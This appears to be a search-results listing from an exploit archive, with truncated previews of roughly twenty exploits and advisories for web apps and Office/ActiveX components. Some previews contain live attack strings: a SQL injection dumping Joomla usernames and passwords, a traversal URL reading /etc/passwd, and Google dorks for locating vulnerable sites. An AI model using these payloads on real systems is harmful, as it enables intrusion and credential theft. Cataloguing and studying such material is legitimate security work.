3100 matches found
kq-admin.txt
!/usr/bin/perl use strict; use LWP::UserAgent; print "-+------------------------------------------+-\n"; print "-+- KnowledgeQuest 2.5 Arbitrary Add Admin -+-\n"; print "-+------------------------------------------+-\n"; print "-+- Discovered && Coded By t0pP8uzz -+-\n"; print "-+- This Exploit...
FLABER <= 1.1 RC1 Remote Command Execution Exploit
Exploit for unknown platform in category web applications ================================================== FLABER " . $FILENAME . " Incorrect parameter targetfile."; 18. exit; 19. 20. 21. 22. $targetfile = "../" . $targetfile; 23. 24. // if it is a file 25. if isfile $targetfile 26. 27. if...
vbe6-dos.txt
Stack overflow in vbe6.dll, used by all versions of MS Office The overflow occurs in Visual Basic for Application. Creating a property with a long name about 247 chars results in a stack overflow in vbe6.dll which overwrites with a null byte the first byte of the return address. Probably impossib...
joomlad3000-sql.txt
Powered by Download 3000 AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 BLOG : http://my.opera.com/SQL-Injection/blog/ MAiL : [email protected] DORK 1 : "Powered by Download 3000" DORK 2 : allinurl: "comd3000" EXPLOiT :...
hiswebshop-traverse.txt
HIS-Webshop is a shopping-system written in Perl by www.shoppark.de The script doesn´t check the "t"-parameter. Example: http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00...
joomladatso-sql.txt
Cr@zyKing [email protected] / hackshow.us Joomla Component comdatsogallery remote SQL Injection Version : v1.3.1 index.php?option=comdatsogallery&func=detail&id='Sql Sql : union+select+1,2,3,4,concatws0x3a,id,username,password,6,7,8,9,0,1,2,3,4,5+from+josusers/ ++++++++++++++++++++++++Güç...
HTTP File Upload ActiveX (UUploaderSvrD.dll) File Deletion Exploit
No description provided by source. HTML !-- - Univeral HTTP File Upload UUploaderSvrD.dll - v6.0.0.35 Remote File Deletetion Exploit - Author: t0pP8uZz Homepage: h4ck-y0u.org / milw0rm.com Description: ActiveX Remote File Deletetion Report: Tested on Microsoft Windows XP Pro SP2 Internet Explorer...
exv2eblog-sql.txt
Powered by eXV2 eblog 1.2 SQL Injection AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MAİL : [email protected] DORKS 1 : allinurl :"modules/eblog" DORK 2 : allinurl :"exoops/modules/eblog" EXPLOIT :...
xoopsegal-sql.txt
XOOPS Module MyeGallery 3.04 download=http://webscripts.softpedia.com/script/Modules/Other-Modules/My-eGallery-dev-8113.html AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MAİL : [email protected] DORKS 1 : allinurl :"modules/myegallery" EXPLOIT :...
Joomla! Component ProductShowcase 1.5 - SQL Injection
Joomla Component comproductshowcase SQL Injection AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 HOME : http://securityreason.com/search/101/c0BidW4=/1/0 MAÄ°L : [email protected] DORKS 1 : allinurl :"comproductshowcase" EXPLOIT :...
Specimen Image Database - 'taxonservice.php?dir' Remote File Inclusion
source: https://www.securityfocus.com/bid/28142/info SID Specimen Image Database is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application and the underlying...
Mitra Informatika Solusindo cart - SQL Injection
SolpotCrew Community Mitra Informatika Solusindo cart Remote Sql Injection Exploit vendor : http://www.mitrainformatika.com/ Bug Found By : homeedition2001 a.k.a bius 4-03-2008 contact: [email protected] Website : www.solpotcrew.org/adv/homeedition2001-adv-03.txt Greetz:...
Google Android Web Browser - .GIF File Heap Buffer Overflow
Google Android Web Browser - .GIF File Heap Buffer Overflow source: https://www.securityfocus.com/bid/28005/info Android Web Browser is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized...
Immunity Canvas: BARRYVAN_INCLUDE
Name| barryvaninclude ---|--- CVE| CVE-2008-1126 Exploit Pack| CANVAS Description| barryvancompo-0.3 remote file include Notes| CVE Name: CVE-2008-1126 VENDOR: barryvancompo Repeatability: Infinite References: http://securityreason.com/exploitalert/3471 CVE Url:...
Symantec BackupExec Calendar Control - PVCalendar.ocx Remote Buffer Overflow
Symantec BackupExec Calendar Control - PVCalendar.ocx Remote Buffer Overflow Symantec BackupExec Calendar ControlPVCalendar.ocx BoF Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 =...
Centreon 1.4.2.3 - 'get_image.php' Remote File Disclosure
!/usr/bin/python Date : 20/01/2008 Author : Julien CAYSSOL import sys, urllib2,re useragent = 'Mozilla/6.0 compatible; MSIE 6.0; Windows NT' headers = 'User-Agent' : useragent , 'Accept-Charset' : 'ISO-8859-15' if name == "main": if lensys.argv==2: host = sys.argv1 print " + Host : " + host url =...
phpnukemye-sql.txt
Aria-Security Team http://Aria-Security.Net ----------------------------- Shoutz: Aura, Null, imm02tal, Kinglet, and our staff PHP-Nuke MyeGallery "gid" Remote SQL Injection Dork: inurl:"modules.php?name=MyeGallery"...
Centreon 1.4.2.3 - get_image.php Remote File Disclosure
Centreon 1.4.2.3 - getimage.php Remote File Disclosure !/usr/bin/python Date : 20/01/2008 Author : Julien CAYSSOL import sys, urllib2,re useragent = 'Mozilla/6.0 compatible; MSIE 6.0; Windows NT' headers = 'User-Agent' : useragent , 'Accept-Charset' : 'ISO-8859-15' if name == "main": if...
auracmslihat-sql.txt
aura cms lihatberita SQL Injectionid AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MAİL : [email protected] DORK 1 : allinurl:"index.php?pilih=lihatberita"id DORK 2 : allinurl: EXPLOIT :...
phpnukeeasy-sql.txt
------------------------------------------------------------------------------- php-nuke modules EasyContent remote sql inj ------------------------------------------------------------------------------- found =xoron -------------------------------------------------------------------------------...